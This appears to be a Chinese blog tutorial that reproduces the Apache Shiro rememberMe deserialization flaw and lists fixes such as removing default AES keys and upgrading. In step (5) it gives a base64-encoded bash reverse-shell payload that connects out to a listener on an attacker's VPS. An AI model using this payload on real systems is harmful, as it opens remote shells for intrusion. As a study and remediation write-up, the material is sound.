一、shiro简介
Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。Shiro首要的和最重要的目标就是容易使用并且容易理解。
二、shiro的身份认证工作流程
- 通过前端传入的值,
- 获取rememberMe cookie
- base64加密
- AES加密 (对称加解密)
- 反序列化
三、shiro反序列化漏洞原理
AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞
四、shiro漏洞复现
(1)开启环境,抓包判断是否是shiro框架
![](https://img-blog.csdnimg.cn/a4e37c57dc4548d18c5248e9bcadf9ca.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiA5Y-l6K-d5pyo6ams,size_15,color_FFFFFF,t_70,g_se,x_16)
在cookie后边加上rememberMe=1,如果回复包出现rememberMe=deleteMe,说明他就是shiro框架
![](https://img-blog.csdnimg.cn/9039712141954624b88f03ae8bf9052e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiA5Y-l6K-d5pyo6ams,size_20,color_FFFFFF,t_70,g_se,x_16)
(2)获取key值,因为key值在源码中,所以需要使用工具获取
![](https://img-blog.csdnimg.cn/77546d0aa3fd4844aecfd876d69d0724.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiA5Y-l6K-d5pyo6ams,size_20,color_FFFFFF,t_70,g_se,x_16)
(3)爆破利用链
![](https://img-blog.csdnimg.cn/8b78d09c049c49ea8c0dde2a97040a44.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiA5Y-l6K-d5pyo6ams,size_20,color_FFFFFF,t_70,g_se,x_16)
(4)执行反序列化漏洞命令执行
![](https://img-blog.csdnimg.cn/f93f5228b4554c728bb96b73a7388459.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiA5Y-l6K-d5pyo6ams,size_13,color_FFFFFF,t_70,g_se,x_16)
(5)利用shrio反弹shell
payload:bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4OC40NC4xNzAvODg4OCAwPiYx}|{base64,-d}|{bash,-i} //需要修改为vps的地址在进行base64加密
监听端口:
![](https://img-blog.csdnimg.cn/db389026836f4a5e9baf5ce6c1676b22.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiA5Y-l6K-d5pyo6ams,size_16,color_FFFFFF,t_70,g_se,x_16)
(5)使用另外一个工具进行爆破
由于工具失效了就不演示了
五、shiro反序列化漏洞的修复
- 删除代码里的默认密钥
- 默认配置里注释了默认密钥
- 升级shiro到1.2.5及以上
- 如果在配置里配置了密钥,那么请一定不要使用网上的密钥,一定不要!!
- 请自己base64一个AES的密钥,或者利用官方提供的方法生成密钥:org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()